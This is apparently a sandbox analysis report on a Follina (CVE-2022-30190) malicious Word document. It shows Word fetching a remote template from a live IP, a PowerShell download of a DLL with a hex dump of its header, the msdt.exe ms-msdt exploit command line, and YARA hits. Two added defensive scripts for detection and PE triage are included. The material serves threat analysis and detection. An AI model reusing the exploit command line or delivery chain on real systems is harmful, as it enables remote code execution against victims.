                                                                                                                                                                      Jun 7, 2022 19:51:26.480565071 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480583906 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480596066 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480602026 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480616093 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.480638027 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.480659962 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                      Jun 7, 2022 19:51:26.484757900 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                      Jun 7, 2022 19:51:26.484778881 CEST8049865185.234.247.119192.168.2.5
• 185.234.247.119

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49744 | 185.234.247.119 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Jun 7, 2022 19:50:11.720185995 CEST | 472 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 185.234.247.119
Jun 7, 2022 19:50:11.748681068 CEST | 473 | IN | HTTP/1.1 405 Not Allowed
Server: nginx
Date: Tue, 07 Jun 2022 17:50:11 GMT
Content-Type: text/html
Content-Length: 150
Connection: keep-alive
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Jun 7, 2022 19:50:11.868760109 CEST | 483 | OUT | HEAD /123.RES HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: 185.234.247.119
Jun 7, 2022 19:50:11.900027037 CEST | 483 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:50:11 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:50:14.981090069 CEST | 937 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 185.234.247.119
Jun 7, 2022 19:50:15.009474993 CEST | 937 | IN | HTTP/1.1 405 Not Allowed
Server: nginx
Date: Tue, 07 Jun 2022 17:50:14 GMT
Content-Type: text/html
Content-Length: 150
Connection: keep-alive
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Jun 7, 2022 19:50:15.701190948 CEST | 1301 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: 185.234.247.119
Jun 7, 2022 19:50:15.729496002 CEST | 1302 | IN | HTTP/1.1 405 Not Allowed
Server: nginx
Date: Tue, 07 Jun 2022 17:50:15 GMT
Content-Type: text/html
Content-Length: 150
Connection: keep-alive
Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
Jun 7, 2022 19:50:15.765372038 CEST | 1302 | OUT | HEAD /123.RES HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-IDCRL_ACCEPTED: t
Host: 185.234.247.119
Jun 7, 2022 19:50:15.793732882 CEST | 1302 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:50:15 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49763 | 185.234.247.119 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Jun 7, 2022 19:50:15.090852022 CEST | 938 | OUT | GET /123.RES HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:50:15.119044065 CEST | 939 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:50:15 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
                                                                                                                                                                      Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
Jun 7, 2022 19:50:15.351569891 CEST | 945 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:50:15.383161068 CEST | 945 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:50:15 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:50:15.592542887 CEST | 1193 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:50:15.620670080 CEST | 1301 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:50:15 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:50:15.807533026 CEST | 1303 | OUT | GET /123.RES HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: 185.234.247.119
If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMT
If-None-Match: "6299dd5d-1861"
Connection: Keep-Alive
Jun 7, 2022 19:50:15.836622953 CEST | 1303 | IN | HTTP/1.1 304 Not Modified
Server: nginx
Date: Tue, 07 Jun 2022 17:50:15 GMT
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Jun 7, 2022 19:50:15.843090057 CEST | 1303 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:50:15.871623039 CEST | 1304 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:50:15 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:50:16.061703920 CEST | 1304 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:50:16.090388060 CEST | 1305 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:50:16 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes
Jun 7, 2022 19:50:18.555954933 CEST | 1305 | OUT | HEAD /123.RES HTTP/1.1
Authorization: Bearer
X-MS-CookieUri-Requested: t
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:50:18.584733009 CEST | 1305 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:50:18 GMT
Content-Type: application/octet-stream
Content-Length: 6241
Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
Connection: keep-alive
ETag: "6299dd5d-1861"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49865 | 185.234.247.119 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
Jun 7, 2022 19:51:26.283952951 CEST | 12199 | OUT | GET /972639944.dat HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: 185.234.247.119
Connection: Keep-Alive
Jun 7, 2022 19:51:26.452574015 CEST | 12201 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jun 2022 17:51:26 GMT
Content-Type: application/octet-stream
Content-Length: 1437696
Connection: keep-alive
Accept-Ranges: bytes
Expires: 0
Cache-Control: no-cache, no-store, must-revalidate
Content-Disposition: attachment;
                                                                                                                                                                      Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54
                                                                                                                                                                      Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B* @Pp%HlSCODE `DATA' (@BSSqP..idata%p&.@.reloclSTT@P.rsrcHH@PP@P@Boolean@FalseT
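The two sessions above are the Follina delivery chain end to end: Word resolves the document's external reference with HEAD requests carrying the "Microsoft Office Existence Discovery" User-Agent, fetches it with its MSIE-compatible "ms-office" UA, and a minute later a PowerShell client pulls a 1.4 MB octet-stream from the same server. The detection below is an added example, not part of the Joe Sandbox report: it parses a constructed tab-separated proxy export modelled on those requests (the UA strings, host, paths and timings are the report's; the column layout, the 5-minute correlation window and the benign rows for a SharePoint host and a probe with no follow-up are assumptions) and raises an alert when an Office probe to a server is followed by a PowerShell download from it.

```python
"""Correlate Office external-reference probes with a follow-on PowerShell
download from the same server, the sequence shown in the two HTTP sessions
above. Added example; the tab-separated log format is constructed for the
demo and is not Joe Sandbox output."""
from __future__ import annotations

import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# User-Agent strings as they appear in the report's requests.
OFFICE_PROBE_UA = "Microsoft Office Existence Discovery"
OFFICE_FETCH_MARK = "ms-office"          # the MSIE-compatible UA Word used for its GET
POWERSHELL_UA_MARK = "WindowsPowerShell/"

# Constructed sample log: the report's requests condensed to one row each,
# plus two constructed rows (a SharePoint existence check and a probe with no
# follow-up) so the scoring has something to separate.
# Columns: timestamp, client, host, method, path, status, content-type, user-agent
SAMPLE_LOG = """\
2022-06-07T17:50:15\t192.168.2.5\t185.234.247.119\tHEAD\t/123.RES\t200\tapplication/octet-stream\tMicrosoft Office Existence Discovery
2022-06-07T17:50:15\t192.168.2.5\t185.234.247.119\tGET\t/123.RES\t304\t-\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; ms-office; MSOffice 16)
2022-06-07T17:50:18\t192.168.2.5\t185.234.247.119\tHEAD\t/123.RES\t200\tapplication/octet-stream\tMicrosoft Office Existence Discovery
2022-06-07T17:51:26\t192.168.2.5\t185.234.247.119\tGET\t/972639944.dat\t200\tapplication/octet-stream\tMozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
2022-06-07T17:52:00\t192.168.2.7\tsharepoint.example.test\tHEAD\t/sites/hr/policy.docx\t200\tapplication/octet-stream\tMicrosoft Office Existence Discovery
2022-06-07T17:53:10\t192.168.2.9\t203.0.113.10\tHEAD\t/x.res\t200\tapplication/octet-stream\tMicrosoft Office Existence Discovery
"""


def parse_log(text: str) -> list[dict]:
    """Turn the tab-separated export into records with a parsed timestamp."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, host, method, path, status, ctype, ua = line.split("\t")
        records.append({
            "ts": datetime.fromisoformat(ts),
            "client": client, "host": host, "method": method, "path": path,
            "status": int(status), "ctype": ctype, "ua": ua,
        })
    return records


def is_raw_ip(host: str) -> bool:
    """Office resolving an external part from a bare IP literal is unusual."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_follina_chains(records: list[dict],
                        window: timedelta = timedelta(minutes=5)) -> list[dict]:
    """Group by (client, server); flag servers that Office probed and that a
    PowerShell client then pulled an octet-stream from inside the window."""
    by_pair: dict[tuple[str, str], list[dict]] = defaultdict(list)
    for rec in records:
        by_pair[(rec["client"], rec["host"])].append(rec)

    alerts = []
    for (client, host), recs in sorted(by_pair.items()):
        recs.sort(key=lambda r: r["ts"])
        probes = [r for r in recs if r["method"] == "HEAD" and r["ua"] == OFFICE_PROBE_UA]
        if not probes:
            continue
        first_probe = probes[0]["ts"]
        office_fetch = [r for r in recs if r["method"] == "GET" and OFFICE_FETCH_MARK in r["ua"]]
        downloads = [
            r for r in recs
            if POWERSHELL_UA_MARK in r["ua"]
            and r["ctype"] == "application/octet-stream"
            and timedelta(0) <= r["ts"] - first_probe <= window
        ]
        if downloads:
            severity = "high"          # probe followed by a scripted binary pull
        elif is_raw_ip(host):
            severity = "medium"        # probe to a bare IP, nothing fetched yet
        else:
            continue                   # ordinary existence check against a named host
        alerts.append({
            "client": client, "host": host, "severity": severity,
            "probe_count": len(probes),
            "office_fetch": bool(office_fetch),
            "payload_path": downloads[0]["path"] if downloads else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_follina_chains(parse_log(SAMPLE_LOG)):
        print(alert)
```

The "Microsoft Office Existence Discovery" probe on its own is routine (Office issues it for OneDrive and SharePoint links), which is why the rule only escalates on a bare-IP destination or on a scripted download from the same server; in a real pipeline the host match would also include the process that opened the socket, which this report records as WINWORD.EXE for the PowerShell-UA session.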


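The first bytes of the 972639944.dat download already identify the toolchain. The following triage script is an added example and not the report's own tooling: it rebuilds the header from the dump above (the DOS header, DOS stub and COFF header bytes are copied verbatim; the zero fill up to e_lfanew and the optional header after its Magic and linker-version fields are regenerated rather than copied, and the six section headers are packed from the values readable in the dump) and then parses it with a small PE reader. An "MZP" stub, e_lfanew of 0x100, the fixed TimeDateStamp 0x2A425E19 and CODE/DATA/BSS section names are the Borland/Delphi linker's fingerprints, and the COFF Characteristics 0xA18E has IMAGE_FILE_DLL set, so the .dat is a DLL rather than an EXE.

```python
"""Decode the DOS header, COFF header and section table of the payload shown
above and report Delphi-linker fingerprints. Added example: header bytes are
copied from the report's hex dump where stated, otherwise reconstructed."""
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
DELPHI_TIMESTAMP = 0x2A425E19        # 1992-06-19 22:22:17 UTC, fixed by the Delphi linker

# Verbatim from the dump: 64-byte DOS header (e_lfanew = 0x100 at offset 0x3C).
DOS_HEADER_HEX = (
    "4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 "
    "b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 "
)
# Verbatim from the dump: 16-byte real-mode stub followed by its message.
DOS_STUB = (bytes.fromhex("ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90")
            + b"This program must be run under Win32\r\n$7")
# Verbatim from the dump: "PE\0\0" signature plus the 20-byte COFF header.
COFF_HEX = "50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1"
# Verbatim from the dump: optional-header Magic (PE32) and linker version 2.25;
# the remaining 220 bytes of the optional header are zero-filled below (constructed).
OPT_HEADER_PREFIX_HEX = "0b 01 02 19"
OPT_HEADER_SIZE = 0xE0

# Section headers as read from the dump: name, VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, Characteristics (reloc/linenumber fields are 0).
SECTIONS = [
    (b"CODE",   0x1101F4, 0x001000, 0x110200, 0x000400, 0x60000020),
    (b"DATA",   0x0027F8, 0x112000, 0x002800, 0x110600, 0xC0000040),
    (b"BSS",    0x001071, 0x115000, 0x000000, 0x112E00, 0xC0000000),
    (b".idata", 0x0025BA, 0x117000, 0x002600, 0x112E00, 0xC0000040),
    (b".reloc", 0x01536C, 0x11A000, 0x015400, 0x115400, 0x50000040),
    (b".rsrc",  0x034800, 0x130000, 0x034800, 0x12A800, 0x50000040),
]
SECTION_FMT = "<8sIIIIIIHHI"            # IMAGE_SECTION_HEADER, 40 bytes


def build_sample() -> bytes:
    """Reassemble the headers (constructed; only the parts noted above are verbatim)."""
    buf = bytearray(bytes.fromhex(DOS_HEADER_HEX)) + DOS_STUB
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    buf += b"\x00" * (e_lfanew - len(buf))          # regenerated zero fill
    buf += bytes.fromhex(COFF_HEX)
    opt = bytearray(bytes.fromhex(OPT_HEADER_PREFIX_HEX))
    opt += b"\x00" * (OPT_HEADER_SIZE - len(opt))   # constructed: body of optional header
    buf += opt
    for name, vsize, vaddr, raw_size, raw_ptr, chars in SECTIONS:
        buf += struct.pack(SECTION_FMT, name, vsize, vaddr, raw_size, raw_ptr, 0, 0, 0, 0, chars)
    return bytes(buf)


def parse_pe(data: bytes) -> dict:
    """Minimal PE reader: DOS header, COFF header, linker version, section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    machine, nsec, tstamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    magic, lmaj, lmin = struct.unpack_from("<HBB", data, e_lfanew + 24)
    sec_off = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsec):
        name, vs, va, raw, ptr, _, _, _, _, sc = struct.unpack_from(SECTION_FMT, data, sec_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "vsize": vs, "vaddr": va,
                         "raw_size": raw, "raw_ptr": ptr, "chars": sc})
    return {
        "dos_magic": data[:3], "e_lfanew": e_lfanew, "machine": machine,
        "num_sections": nsec, "timestamp": tstamp, "characteristics": chars,
        "is_dll": bool(chars & IMAGE_FILE_DLL), "pe32": magic == 0x10B,
        "linker": (lmaj, lmin), "sections": sections,
        "borland_stub_message": b"This program must be run under Win32" in data[0x40:e_lfanew],
    }


def triage(info: dict) -> list[str]:
    """Turn header facts into analyst-readable findings."""
    findings = []
    if info["dos_magic"] == b"MZP":
        findings.append("DOS stub starts with MZP (Borland/Delphi linker signature)")
    if info["e_lfanew"] == 0x100 and info["borland_stub_message"]:
        findings.append("PE header at 0x100 behind the Borland 'must be run under Win32' stub")
    if info["timestamp"] == DELPHI_TIMESTAMP:
        findings.append("TimeDateStamp is the fixed Delphi value 0x2A425E19, build time not usable")
    if {"CODE", "DATA", "BSS"} <= {s["name"] for s in info["sections"]}:
        findings.append("Borland section names CODE/DATA/BSS present")
    if info["machine"] == IMAGE_FILE_MACHINE_I386 and info["pe32"]:
        findings.append("32-bit i386 PE32 image")
    if info["is_dll"]:
        findings.append("IMAGE_FILE_DLL set: the .dat download is a DLL, not an EXE")
    for s in info["sections"]:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {s['name']} is writable and executable")
    return findings


if __name__ == "__main__":
    for line in triage(parse_pe(build_sample())):
        print(line)
```

Because the optional header body is zero-filled in the reconstruction, entry point, image base and data directories are not meaningful here; on the real file the same parser reads them from the bytes the dump truncates.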

Target ID: 0
Start time: 19:50:04
Start date: 07/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x10a0000
File size: 1937688 bytes
MD5 hash: 0B9AB9B9C4DE429473D6450D4297A123
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 19:50:11
Start date: 07/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0x3b0000
File size: 466688 bytes
MD5 hash: EA19F4A0D18162BE3A0C8DAD249ADE8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 4
Start time: 19:50:11
Start date: 07/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Imagebase: 0x3b0000
File size: 466688 bytes
                                                                                                                                                                      MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:19:50:17
                                                                                                                                                                      Start date:07/06/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                      Imagebase:0x870000
                                                                                                                                                                      File size:1508352 bytes
                                                                                                                                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.710859302.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.711008375.0000000003308000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, Source: 00000007.00000002.710962250.0000000003300000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
